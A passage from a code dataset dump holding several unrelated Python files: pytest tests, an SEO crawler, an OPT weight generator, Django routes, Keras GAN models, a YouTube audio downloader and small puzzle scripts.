Y","repo_name":"Everchange/PredVir","sub_path":"Traitement.py","file_name":"Traitement.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26816376542","text":"import pytest\nimport numpy as np\nimport src.clean_data as cd\n\n# Happy path tests\n@pytest.mark.parametrize(\n \"text,expected\",\n [\n (\"2.50h m\", 2.5), \n (\"10.30h m\", 10.3),\n (\"3h 30m\", 3.5),\n (\"1h 45m\", 1.75),\n ],\n)\ndef test_get_duration_happy_path(text, expected):\n assert cd.get_duration(text) == expected\n\n\n# Unhappy path tests\n@pytest.mark.parametrize(\n \"text\",\n [\n \"2.5\", \n \"10h\", \n \"3h m\", \n \"abcd\",\n \"\",\n ],\n)\ndef test_get_duration_unhappy_path(text):\n with pytest.raises(Exception):\n cd.get_duration(text)\n\n\n# Define a common stop dictionary for the tests\n@pytest.fixture\ndef setup_stops():\n # Stop dict\n stop_dict = {\"non-stop\": 0,\n \"1-stop\": 1,\n \"2+-stop\": 2}\n return stop_dict\n\n\n# Happy path tests\n@pytest.mark.parametrize(\n \"text, expected\",\n [\n (\"non-stop\", 0), \n (\"1-stop\", 1),\n (\"2+-stops\", 2),\n (\"3 stops\", np.nan)\n ],\n)\ndef test_get_stops_happy_path(setup_stops, text, expected):\n # Define a common regex pattern for the tests\n pattern = r'non-stop|1-stop|2\\+-stop'\n result = cd.get_stops(text, pattern, setup_stops)\n\n if np.isnan(expected):\n assert np.isnan(result)\n else:\n assert result == expected\n\n\n# Unhappy path tests\n@pytest.mark.parametrize(\n \"text\",\n [\n \"stop\", \n \"stops\", \n \"1\", \n \"2\",\n \"\",\n ],\n)\ndef test_get_stops_unhappy_path(setup_stops, text):\n pattern = r'non-stop|1-stop|2\\+-stop'\n assert np.isnan(cd.get_stops(text,pattern,setup_stops))\n\n\n# Set hours dictionary\n@pytest.fixture\ndef set_bucketDict(): \n hour_buckets = {\n \"early_morning\": {\"min\": 4, \"max\": 8},\n \"morning\": {\"min\": 6, \"max\": 12}, \n \"afternoon\": {\"min\": 12, \"max\": 16},\n \"evening\": {\"min\": 16, \"max\": 20},\n \"night\": {\"min\": 20, \"max\": 24},\n \"late_night\":{\"min\": 0, \"max\": 4}\n }\n return hour_buckets\n\n# Happy path tests\n@pytest.mark.parametrize(\n \"time, expected\",\n [\n (\"00:00\", \"late_night\"), \n (\"06:20\", \"morning\"),\n (\"12:08\", \"afternoon\"),\n (\"18:43\", \"evening\"),\n (\"04:38\", \"early_morning\"),\n (\"12:00\", \"afternoon\")\n ],\n)\ndef test_bucket_hours_happy_path(set_bucketDict, time, expected):\n assert cd.bucket_hours(time, set_bucketDict) == expected\n\n# Unhappy path tests\n@pytest.mark.parametrize(\n \"time\",\n [\n \"25:00\", \n \"60:00\", \n \"100:00\",\n \"\",\n ],\n)\ndef test_bucket_hours_unhappy_path(time):\n with pytest.raises(Exception):\n cd.bucket_hours(time, set_bucketDict)\n","repo_name":"AlejandraLLI/Cloud_Engineering_Project","sub_path":"04_Implementation/pipeline/tests/test_clean_data.py","file_name":"test_clean_data.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29591531179","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport tldextract as tld\nimport csv\nimport xmltodict\nimport pandas as pd\n\nfrom settings import *\n\n\n'''\nTODO\n- create decorator class to time a function - decorators.py\n- Need to abstract out some functions so that they can take more flexible paramaters\n- Add error handling\n\n'''\n\ndef generate_data(name, url):\n '''\n Given a url, a json object is stored\n '''\n\n print(\"Starting page crawl...\")\n data = get_all_pages(url)\n\n save_as_file(data)\n \n print(\"File complete.\")\n\n return data\n\ndef save_as_file(data, name=NAME):\n\n # Create file name template\n file_name = name + \"_data.csv\"\n\n keys = ['url'] + list(data[list(data.keys())[0]].keys())\n\n df = pd.DataFrame.from_dict(data, orient='index')\n\n\n # df = df.rename(columns={df.iloc[:,0].name: 'URL'})\n\n df.to_csv(file_name, index=False)\n\ndef get_corpus(data):\n\n corpus = dict()\n\n # Generate corpus of links (do this from local memory, no need to crawl)\n for url in data:\n corpus[url] = data[url]['links_out']\n\n return corpus\n\ndef on_page_data(page):\n \"\"\"\n Crawl a web page and return on page data \n\n Ignores pages set to no-index and no-follow links\n\n - check only in body\n\n - block resource folders (.*/wp-.*)\n - Check for robots.txt file\n - - Check for redirect chain if r.history > 0\n \"\"\"\n\n # Crawl page\n req = requests.get(page)\n\n # If status is 200\n if req.status_code == 200:\n soup = BeautifulSoup(req.text, \"html.parser\")\n else:\n return None\n\n # Get index status\n index = soup.find(\"meta\", {\"name\":\"robots\"})\n if index == \"no-index\":\n return None\n\n # Get meta data\n title = soup.find(\"title\")\n description = soup.find(\"meta\", {\"name\":\"description\"})\n canonical = soup.find(\"link\", {\"rel\":\"canonical\"})\n og_title = soup.find(\"meta\", {\"property\":\"og:title\"})\n og_description = soup.find(\"meta\", {\"property\":\"og:description\"})\n\n\n # Find interal links only \n num_links = 0 # total\n links = []\n num_links_out = 0 # number of links to interal pages\n external_links = []\n num_ext_out = 0 # number of links to external pages\n for link in soup.find_all('a'):\n num_links += 1\n destination = link.get('href')\n rel = link.get('rel')\n own_domain = tld.extract(page).domain\n\n # Handle none type\n if not destination:\n continue\n\n # Strip anchors and url parameters\n destination = destination.split(\"#\")[0]\n destination = destination.split('?')[0]\n\n # If relative path match\n if re.match('/.*', destination):\n sub_domain = tld.extract(page).subdomain\n if sub_domain:\n destination = 'https://' + sub_domain + own_domain + '.' + tld.extract(page).suffix + destination\n else:\n destination = 'https://' + own_domain + '.' + tld.extract(page).suffix + destination\n\n # If external link\n if tld.extract(destination).domain != own_domain:\n num_ext_out += 1\n external_links.append(destination)\n continue\n\n if re.match(\"mailto:.*\", destination) or re.match(\"tel:.*\", destination):\n continue\n\n # If no-follow link\n if rel == 'no-follow':\n continue\n\n num_links_out += 1\n links.append(destination)\n\n # Get image data\n images = []\n num_images = 0\n missing_alt = 0\n for img in soup.find_all(\"img\"):\n image_url = img.get(\"src\")\n image_alt = img.get(\"alt\")\n\n images.append(image_url)\n num_images += 1\n if not image_alt:\n missing_alt += 1\n\n # Get Schema data\n schema = soup.find(\"script\", {\"type\": \"application/ld+json\"})\n schema = schema.text if schema else None\n\n # Get page headings\n h1 = []\n h2 = []\n h3 = []\n h4 = []\n h5 = []\n h6 = []\n for h_1 in soup.find_all(\"h1\"):\n h1.append(h_1.text)\n for h_2 in soup.find_all(\"h2\"):\n h2.append(h_2.text)\n for h_3 in soup.find_all(\"h3\"):\n h3.append(h_3.text)\n for h_4 in soup.find_all(\"h4\"):\n h4.append(h_4.text)\n for h_5 in soup.find_all(\"h5\"):\n h5.append(h_5.text)\n for h_6 in soup.find_all(\"h6\"):\n h6.append(h_6.text)\n\n # Build info about single page\n page_data = {\n \"url\": page,\n \"links_out\": links,\n \"ext_links_out\": external_links,\n \"meta_title\": str(title.text) if title else None,\n \"meta_description\": str(description[\"content\"]) if description else None,\n \"meta_canonical\": str(canonical[\"href\"]) if canonical else None,\n \"meta_og_title\": str(og_title[\"content\"]) if og_title else None,\n \"meta_og_desc\": str(og_description[\"content\"]) if og_description else None,\n \"images\": images,\n \"missing_alt\": missing_alt,\n 'num_images': num_images,\n \"schema\": schema,\n \"h1\": h1 if h1 else None,\n \"h1_count\": len(h1),\n \"h2\": h2 if h2 else None,\n \"h2_count\": len(h2),\n \"h3\": h3 if h3 else None,\n \"h3_count\": len(h3),\n \"h4\": h4 if h4 else None,\n \"h4_count\": len(h4),\n \"h5\": h5 if h5 else None,\n \"h5_count\": len(h5),\n \"h6\": h6 if h6 else None,\n \"h6_count\": len(h6)\n }\n\n return page_data\n\ndef find_keys(d, key):\n '''\n Takes a dictonary and returns all nested values matching a key\n '''\n if isinstance(d, list):\n for i in d:\n for x in find_keys(i, key):\n yield x\n elif isinstance(d, dict):\n if key in d:\n yield d[key]\n for j in d.values():\n for x in find_keys(j, key):\n yield x\n\ndef links_from_sitemap(sitemap, links=None):\n '''\n Returns a set of all pages in a sitemap\n ''' \n # Get XML and save to dict\n resp = requests.get(sitemap)\n sitemap_dict = xmltodict.parse(resp.content)\n\n if not links:\n links = set()\n\n # Find all 'loc' keys in sitemap\n found = set(find_keys(sitemap_dict, 'loc'))\n\n # If another sitemap else add to links\n for url in found:\n if re.match(\".*.xml\", url):\n links = links.union(links_from_sitemap(url))\n else:\n links.add(url)\n return links\n\ndef get_all_pages(url, sitemap=sitemap):\n '''\n Takes a list of links and returns a set of pages \n\n return dict of pages as keys and meta info as dict of values\n '''\n\n pages = set()\n\n # If sitemap start with these links\n if sitemap:\n crawl = links_from_sitemap(sitemap)\n else:\n crawl = set([url])\n\n data = dict()\n while crawl:\n \n # Get a new page to crawl\n page = crawl.pop()\n\n # Record page as page\n pages.add(page)\n\n # Get all internal links on page\n page_info = on_page_data(page)\n\n if not page_info:\n continue\n\n # Add page info to data\n data[page] = page_info\n page_links = page_info['links_out']\n\n # Create a set of links on page\n page_links = set(page_links)\n\n # Get pages that are not already in crawl or pages\n new_pages = page_links.difference(crawl, pages)\n\n # Add new pages to crawl\n crawl = crawl.union(new_pages)\n\n return data\n\ndef update_internal_links(data):\n '''\n Updates internal links to show inbound links\n '''\n \n # Check for other pages linking\n for page_1 in data:\n linked_from = []\n for page_2 in data:\n if page_1 == page_2:\n continue\n if page_1 in data[page_2]['links_out']:\n linked_from.append(page_2)\n \n # Update internal links\n data[page_1]['links_in'] = linked_from if linked_from else None\n data[page_1]['links_in'] = len(linked_from)\n\n return data\n\ndef check_redirect_chains(data):\n '''\n Takes a dictonary and updates a count for how many redirects are on each page. Creates a csv s\n\n ..Opt..\n - clean url of parameters before checking and adding to set\n - Take a page url and a list of links instead\n '''\n\n # Don't check pages that are keys of data\n checked = set(data.keys())\n\n has_redirects = set()\n redirect_chains = set()\n\n # Check all known links\n for page in data:\n count = 0\n\n for url in data[page]['links_out']:\n try:\n # If redirect already found\n if url in has_redirects:\n count += 1\n continue\n elif url in checked:\n continue\n\n r = requests.get(url)\n\n if len(r.history) > 0:\n # Count a redirect\n count += 1\n chain = []\n\n final_url = r.url\n for resp in r.history:\n chain.append(resp.url)\n\n # Add urls already in a chain to checked\n checked.add(resp.url)\n\n if resp.url != final_url:\n has_redirects.append(resp.url)\n\n redirect_chains.add(chain)\n\n except requests.ConnectionError:\n print(\"Error: failed to connect.\")\n \n # Save number of links\n data[page][\"redirect_links\"] = count\n\n # Save redirect chains to csv file\n with open(NAME + \"_chains.csv\", 'w') as f:\n writer = csv.writer(f)\n writer.writerow(redirect_chains)\n\n return data\n\n # Update links that are source\n for page in data:\n links = data[page]\n\nif __name__ == '__main__':\n generate_data(NAME, URL)","repo_name":"arah44/seo-scraper","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":9709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34640499858","text":"import argparse\nimport json\nimport os\nimport torch\nfrom transformers.models.opt import OPTConfig\nfrom transformers_neuronx.module import sanitize_file_name, _KEY_TO_FILENAME_JSON\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('name', help=\"OPT model name or path to config.json\")\n parser.add_argument('save', help=\"target folder to save the model\")\n parser.add_argument('--empty', action='store_true')\n args = parser.parse_args()\n gen_random_pretrained(args.name, args.save, args.empty)\n\n\ndef gen_random_pretrained(model_name, save, empty=False):\n if 'json' in model_name:\n config = json.load(open(model_name))\n elif model_name == 'facebook/opt-175b':\n config = opt_175b_config()\n else:\n config = OPTConfig.from_pretrained(model_name).to_dict()\n os.makedirs(save, exist_ok=True)\n with open(os.path.join(save, 'config.json'), 'w') as fp:\n json.dump(config, fp, indent=2)\n vocab_size = config['vocab_size']\n hidden_size = config['hidden_size']\n max_position_embeddings = config['max_position_embeddings']\n ffn_dim = config['ffn_dim']\n num_hidden_layers = config['num_hidden_layers']\n init_std = config['init_std']\n torch_dtype = config['torch_dtype']\n name2shape = {\n 'model.decoder.embed_tokens.weight': [vocab_size, hidden_size],\n 'model.decoder.embed_positions.weight': [max_position_embeddings + 2, hidden_size],\n 'model.decoder.final_layer_norm.weight': [hidden_size],\n 'model.decoder.final_layer_norm.bias': [hidden_size],\n }\n layer_name2shape = {\n 'self_attn.k_proj.weight': [hidden_size, hidden_size],\n 'self_attn.k_proj.bias': [hidden_size],\n 'self_attn.v_proj.weight': [hidden_size, hidden_size],\n 'self_attn.v_proj.bias': [hidden_size],\n 'self_attn.q_proj.weight': [hidden_size, hidden_size],\n 'self_attn.q_proj.bias': [hidden_size],\n 'self_attn.out_proj.weight': [hidden_size, hidden_size],\n 'self_attn.out_proj.bias': [hidden_size],\n 'self_attn_layer_norm.weight': [hidden_size],\n 'self_attn_layer_norm.bias': [hidden_size],\n 'fc1.weight': [ffn_dim, hidden_size],\n 'fc1.bias': [ffn_dim],\n 'fc2.weight': [hidden_size, ffn_dim],\n 'fc2.bias': [hidden_size],\n 'final_layer_norm.weight': [hidden_size],\n 'final_layer_norm.bias': [hidden_size],\n }\n for idx in range(num_hidden_layers):\n for name, shape in layer_name2shape.items():\n name2shape[f'model.decoder.layers.{idx}.{name}'] = shape\n name2shape['lm_head.weight'] = [vocab_size, hidden_size]\n key_to_filename = {}\n for idx, key in enumerate(name2shape.keys()):\n key_to_filename[key] = f'p{idx}.{sanitize_file_name(key)}'\n if empty:\n key_to_filename[key] = f'{key_to_filename[key]}.empty_json'\n split_param_dir = os.path.join(save, 'pytorch_model.bin')\n os.makedirs(split_param_dir, exist_ok=True)\n with open(os.path.join(split_param_dir, _KEY_TO_FILENAME_JSON), 'w') as fp:\n json.dump(key_to_filename, fp, indent=2)\n dtype = getattr(torch, torch_dtype)\n for name, shape in name2shape.items():\n save_path = os.path.join(split_param_dir, key_to_filename[name])\n factor = 0.0 if 'layer_norm' in name or 'bias' in name else init_std\n if empty:\n empty_json = {\n 'torch_dtype': torch_dtype,\n 'shape': shape,\n 'init_std': factor,\n }\n with open(save_path, 'w') as fp:\n json.dump(empty_json, fp, indent=2)\n continue\n init_param = factor * torch.randn(shape)\n init_param = init_param.to(dtype)\n torch.save(init_param, save_path)\n print(f'done saving {save_path}')\n\n\ndef opt_175b_config():\n vocab_size = 50272\n hidden_size = 12288\n max_position_embeddings = 2048\n ffn_dim = 49152\n num_hidden_layers = 96\n init_std = 0.02\n config = dict(\n _name_or_path='facebook/opt-175b',\n _remove_final_layer_norm=False,\n activation_dropout=0.0,\n activation_function='relu',\n architectures=['OPTForCausalLM'],\n attention_dropout=0.0,\n bos_token_id=2,\n do_layer_norm_before=True,\n dropout=0.1,\n eos_token_id=2,\n ffn_dim=ffn_dim,\n hidden_size=hidden_size,\n init_std=init_std,\n layerdrop=0.0,\n max_position_embeddings=max_position_embeddings,\n model_type='opt',\n num_attention_heads=96,\n num_hidden_layers=num_hidden_layers,\n output_projection=True,\n pad_token_id=1,\n prefix='',\n torch_dtype='float16',\n transformers_version='4.23.1',\n use_cache=True,\n vocab_size=vocab_size,\n word_embed_proj_dim=hidden_size,\n )\n return config\n","repo_name":"aws-neuron/transformers-neuronx","sub_path":"src/transformers_neuronx/opt/gen_random_pretrained.py","file_name":"gen_random_pretrained.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"3"} +{"seq_id":"9239830535","text":"\"\"\"Blog URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n# from django.contrib import admin\nfrom django.urls import path,re_path\nfrom web.views import account\nfrom web.views import home\nurlpatterns = [\n path('register.html', account.register),\n path('check_code.html',account.check_code),\n path('login.html',account.login),\n path('logout.html',account.logout),\n re_path('(?P\\w+)/(?P\\d+).html',home.detail),\n re_path('(?P\\w+).html',home.home),\n re_path('(?P\\w+)/(?P((tag)|(date)|(category)))/(?P\\w+-*\\w*).html', home.filter),\n re_path('all/(?P\\d+).html', home.index, name='index'),\n\n path('',home.index),\n\n\n]\n","repo_name":"44aced/blog","sub_path":"web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17091967360","text":"\"\"\"\nThis works as a smoke test for elasticsearch tests and at the same\ntime, as a template to make more tests\n\"\"\"\nimport requests\nfrom conftest import ES_TOKEN\n\n\ndef description():\n return \"\"\"

Add one single document

\n
\n

Using the Single document APIs add one document into the test-index of document type _doc, with the following content:

\n
\n{\n \"@timestamp\": \"1969-07-20T20:17:00.000Z\",\n \"event\": {\n \"original\": \"Apollo 11 - Moon landing\"\n }\n}\n
\n\"\"\"\n\n\ndef test_if_server_is_alive():\n print(f\"Token: {ES_TOKEN}\")\n try:\n r = requests.get(\n \"https://localhost:9200/_search\",\n headers={\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"Basic {ES_TOKEN}\",\n },\n verify=\"./certs/ca/ca.crt\",\n )\n status = r.status_code\n except:\n status = 404\n\n assert status == 201\n","repo_name":"ferro2o3/es-testing","sub_path":"tests/001-getting-started/0001_add_single_document.py","file_name":"0001_add_single_document.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8472782338","text":"class Solution:\n def singleNumber(self, nums: List[int]) -> int:\n # answer = 0\n # for num in nums:\n # #All the numbers that have a pair will zero out!!!\n # answer ^= num #Awesome idea!!! \n # return answer\n set_num = set()\n for num in nums:\n if num in set_num:\n set_num.remove(num)\n else:\n set_num.add(num)\n return set_num.pop()\n ","repo_name":"robertomaldonado/LeetHubCode","sub_path":"136-single-number/136-single-number.py","file_name":"136-single-number.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7637580455","text":"from keras.applications import VGG19\nimport keras\n\nimport config\n\ndef buildVGG():\n \"\"\"Build and return the vgg network for feature extraction.\"\"\"\n vgg19 = VGG19(\n include_top=False,\n weights='imagenet',\n input_shape=config.IMG_SHAPE\n )\n vgg19.trainable = False\n for layer in vgg19.layers:\n layer.trainable = False\n\n feature_extractor = keras.models.Model(\n inputs=vgg19.input,\n outputs=vgg19.get_layer(\"block2_conv2\").output\n )\n\n feature_extractor.trainable = False\n return feature_extractor\n\n\ndef buildGenerator(kernel_size, layers, bn, kpcn, kpcn_size):\n \"\"\"Build and return the generator for use in the gan.\"\"\"\n def convLayer(c_input, num_filters):\n \"\"\"Helper function for a convolutional block.\"\"\"\n c_output = keras.layers.Conv2D(\n filters=num_filters,\n kernel_size=kernel_size,\n use_bias=False,\n strides=[1, 1],\n padding=\"SAME\",\n kernel_initializer=keras.initializers.glorot_normal(seed=5678)\n )(c_input)\n return c_output\n\n ################################################\n\n # The generator takes a noisy image as input\n noisy_img = keras.layers.Input(config.DENOISER_INPUT_SHAPE, name=\"Generator_input\")\n\n # 9 fully convolutional layers\n x = convLayer(noisy_img, 100)\n x = keras.layers.ReLU()(x)\n for _ in range(layers):\n x = convLayer(x, 100)\n if bn:\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.ReLU()(x)\n\n # Final layer is not activated\n if kpcn:\n weights = convLayer(x, pow(kpcn_size, 2))\n else:\n weights = convLayer(x, 3)\n\n return keras.models.Model(noisy_img, weights, name=\"Generator\")\n\ndef buildCritic():\n \"\"\"Build and return the critic for use in th GAN.\"\"\"\n def convBlock(c_input, num_filters, strides):\n \"\"\"Helper function for a convolutional block. Includes LeakyReLU\n activation.\"\"\"\n c_output = keras.layers.Conv2D(\n filters=num_filters,\n kernel_size=[3, 3],\n strides=strides,\n padding=\"SAME\"\n )(c_input)\n \n output = keras.layers.LeakyReLU(alpha=0.2)(c_output)\n \n return output\n\n ################################################\n\n img = keras.layers.Input(shape=config.IMG_SHAPE, name=\"Critic_input\")\n \n x = convBlock(img, 64, strides=[1, 1])\n x = convBlock(img, 64, strides=[2, 2])\n x = keras.layers.Dropout(0.4)(x)\n x = convBlock(x, 128, strides=[1, 1])\n x = convBlock(x, 128, strides=[2, 2])\n x = keras.layers.Dropout(0.4)(x)\n x = convBlock(x, 256, strides=[1, 1])\n x = convBlock(x, 256, strides=[2, 2])\n x = keras.layers.Dropout(0.4)(x)\n x = convBlock(x, 512, strides=[1, 1])\n x = convBlock(x, 512, strides=[2, 2])\n x = keras.layers.Dropout(0.4)(x)\n\n #x = keras.layers.Dense(1024)(x)\n #x = keras.layers.Dropout(0.5)(x)\n x = keras.layers.LeakyReLU(alpha=0.2)(x)\n x = keras.layers.Flatten()(x)\n x = keras.layers.Dense(1)(x)\n\n return keras.models.Model(img, x, name=\"Critic\")\n\n\ndef buildDiscriminator():\n \"\"\"Build and return the discriminator for use in vanilla GAN.\"\"\"\n def convBlock(c_input, num_filters, strides, bn=True):\n \"\"\"Helper function for a convolutional block.\"\"\"\n c_output = keras.layers.Conv2D(\n filters=num_filters,\n kernel_size=[3, 3],\n strides=strides,\n padding=\"SAME\"\n )(c_input)\n\n output = keras.layers.LeakyReLU(alpha=0.2)(c_output)\n\n if bn:\n output = keras.layers.BatchNormalization(momentum=0.8)(output)\n\n return output\n\n ################################################\n\n img = keras.layers.Input(shape=self.img_shape, name=\"Discriminator_input\")\n\n x = convBlock(img, 64, strides=[1, 1], bn=False)\n x = convBlock(x, 64, strides=[2, 2])\n x = convBlock(x, 128, strides=[1, 1])\n x = convBlock(x, 128, strides=[2, 2])\n x = convBlock(x, 256, strides=[1, 1])\n x = convBlock(x, 256, strides=[2, 2])\n x = convBlock(x, 512, strides=[1, 1])\n x = convBlock(x, 512, strides=[2, 2])\n\n x = keras.layers.Dense(1024)(x)\n x = keras.layers.LeakyReLU(alpha=0.2)(x)\n x = keras.layers.Flatten()(x)\n prob = keras.layers.Dense(1, activation='sigmoid')(x)\n\n return keras.models.Model(img, prob, name=\"Discriminator\")\n\n","repo_name":"jamesTait-jt/monte-carlo-denoiser","sub_path":"denoiser/code/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32595763600","text":"import cv2\nimport numpy\nimport torch\nimport numpy as np\nfrom imgaug import augmenters as iaa\nfrom pycocotools import mask as cocomask\nimport pandas as pd\nfrom src.config import *\nimport matplotlib.pyplot as plt\n\n\ndef load_image(path, mask=False, aug=None):\n \"\"\"\n Load image from a given path and pad it on the sides, so that eash side is divisible by 32 (newtwork requirement)\n\n if pad = True:\n returns image as numpy.array, tuple with padding in pixels as(x_min_pad, y_min_pad, x_max_pad, y_max_pad)\n else:\n returns image as numpy.array\n \"\"\"\n\n img = cv2.imread(str(path))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n if aug:\n img = aug.augment_images([img])[0]\n\n height, width, _ = img.shape\n\n # Padding in needed for UNet models because they need image size to be divisible by 32\n if height % 32 == 0:\n y_min_pad = 0\n y_max_pad = 0\n else:\n y_pad = 32 - height % 32\n y_min_pad = int(y_pad / 2)\n y_max_pad = y_pad - y_min_pad\n\n if width % 32 == 0:\n x_min_pad = 0\n x_max_pad = 0\n else:\n x_pad = 32 - width % 32\n x_min_pad = int(x_pad / 2)\n x_max_pad = x_pad - x_min_pad\n # plt.subplot(121)\n # plt.imshow(img)\n img = cv2.copyMakeBorder(img, y_min_pad, y_max_pad, x_min_pad, x_max_pad, cv2.BORDER_REFLECT_101)\n # plt.subplot(122)\n # plt.imshow(img)\n # plt.show()\n if mask:\n # Convert mask to 0 and 1 format\n img = img[:, :, 0:1] // 255\n return torch.from_numpy(img).float().permute([2, 0, 1])\n else:\n img = img / 255.0\n return torch.from_numpy(img).float().permute([2, 0, 1])\n\n\ndef rle_encoding(x):\n dots = np.where(x.T.flatten() == 1)[0]\n run_lengths = []\n prev = -2\n for b in dots:\n if (b > prev + 1): run_lengths.extend((b + 1, 0))\n run_lengths[-1] += 1\n prev = b\n return run_lengths\n\n\ndef save_checkpoint(model, extra, checkpoint, optimizer=None):\n state = {'state_dict': model.state_dict(),\n 'extra': extra}\n if optimizer:\n state['optimizer'] = optimizer.state_dict()\n\n torch.save(state, CHECKPOINT_DIR + checkpoint)\n\n print('model saved to %s' % (CHECKPOINT_DIR + checkpoint))\n\n\ndef load_checkpoint(model, checkpoint, optimizer=None):\n state = torch.load(CHECKPOINT_DIR + checkpoint)\n # del state['state_dict']['final.weight']\n # del state['state_dict']['final.bias']\n model.load_state_dict(state['state_dict'], strict=False)\n optimizer_state = state.get('optimizer')\n if optimizer and optimizer_state:\n optimizer.load_state_dict(optimizer_state)\n\n print(\"Checkpoint loaded: %s \" % state['extra'])\n return state['extra']\n\n\ndef get_paddings():\n height, width = IMAGE_PADDED, IMAGE_PADDED\n if height % 32 == 0:\n y_min_pad = 0\n y_max_pad = 0\n else:\n y_pad = 32 - height % 32\n y_min_pad = int(y_pad / 2)\n y_max_pad = y_pad - y_min_pad\n if width % 32 == 0:\n x_min_pad = 0\n x_max_pad = 0\n else:\n x_pad = 32 - width % 32\n x_min_pad = int(x_pad / 2)\n x_max_pad = x_pad - x_min_pad\n return x_max_pad, x_min_pad, y_max_pad, y_min_pad\n\n\ndef build_submission(binary_prediction, test_file_list):\n all_masks = []\n for p_mask in list(binary_prediction):\n p_mask = rle_encoding(p_mask)\n all_masks.append(' '.join(map(str, p_mask)))\n submit = pd.DataFrame([test_file_list, all_masks]).T\n submit.columns = ['id', 'rle_mask']\n return submit\n\n\ndef crop_to_original_size(predictions):\n x_max_pad, x_min_pad, y_max_pad, y_min_pad = get_paddings()\n stacked_predictions = np.vstack(predictions)[:, 0, :, :]\n stacked_predictions = stacked_predictions[:, y_min_pad:IMAGE_TOTAL_SIZE - y_max_pad,\n x_min_pad:IMAGE_TOTAL_SIZE - x_max_pad]\n return stacked_predictions\n","repo_name":"AChepurnoi/kaggle-tgs-salt","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24457485949","text":"def main():\n x = get_int(\"What's x? \")\n print(f\"You've entered: {x}\")\n \ndef get_int(prompt):\n while True:\n try:\n x = int(input(prompt))\n except ValueError:\n print(\"That's not a number! Try again.\") # pass can be used here\n else:\n break\n\n return x\n \n \nmain()\n","repo_name":"eugeneayonga/CS50P","sub_path":"exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72962938000","text":"# importing packages\r\nfrom pytube import YouTube\r\nimport os\r\n\r\n\r\n\r\ndef download(url):\r\n# url input from user\r\n yt = YouTube(str(url))\r\n\r\n # extract only audio\r\n video = yt.streams.filter(only_audio=True).first()\r\n \r\n # check for destination to save file\r\n \r\n destination = './'\r\n\r\n # download the file\r\n out_file = video.download(output_path=destination)\r\n\r\n # save the file\r\n base, ext = os.path.splitext(out_file)\r\n new_file = base + '.mp3'\r\n os.rename(out_file, new_file)\r\n\r\n\r\n # result of success\r\n \r\n return new_file\r\n\r\n","repo_name":"yasir-dev1/Speech-To-Text-1","sub_path":"Downloader.py","file_name":"Downloader.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72833850000","text":"\"\"\"\nDay 12 initial solution\nBenjamin Wheeler\n\"\"\"\nimport turtle\n\n\ndef part1(directions=None) -> int:\n if not directions:\n with open('day12.input', 'r') as f:\n directions = f.read()\n\n directions = directions.splitlines()\n\n # Utilize a Turtle to follow the instructions!\n s = turtle.Screen()\n s.screensize(1200, 1600)\n\n t = turtle.Turtle()\n\n movements = {\n 'N': lambda dist: t.sety(t.ycor() + dist),\n 'S': lambda dist: t.sety(t.ycor() - dist),\n 'E': lambda dist: t.setx(t.xcor() + dist),\n 'W': lambda dist: t.setx(t.xcor() - dist),\n 'L': lambda deg: t.left(deg),\n 'R': lambda deg: t.right(deg),\n 'F': lambda dist: t.forward(dist)\n }\n\n for direction in directions:\n command, *arg = direction\n arg = int(''.join(arg))\n\n # Run the command\n movements[command](arg)\n\n # print('Turtle is done, you can now close the window.')\n # turtle.done()\n\n # Return the Manhattan distance.\n return abs(int(t.xcor())) + abs(int(t.ycor()))\n\n\nif __name__ == '__main__':\n print(f'Running day 12...')\n answer = part1()\n print('Part 1:', answer)\n\n print('Done.')\n\n","repo_name":"benjamin051000/adventofcode","sub_path":"2020/day12/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40429638092","text":"# I dislike this solution even more but it's pretty funny\nfile = open(\"input.txt\", \"r\")\nfileLines = [line.strip(\"\\n\") for line in file.readlines()]\n\n# Structure for each subarray: Lose, Draw, Win\nveryBadList = [[\"Z\", \"X\", \"Y\"], [\"X\", \"Y\", \"Z\"], [\"Y\", \"Z\", \"X\"]]\n\nscoreStep1 = 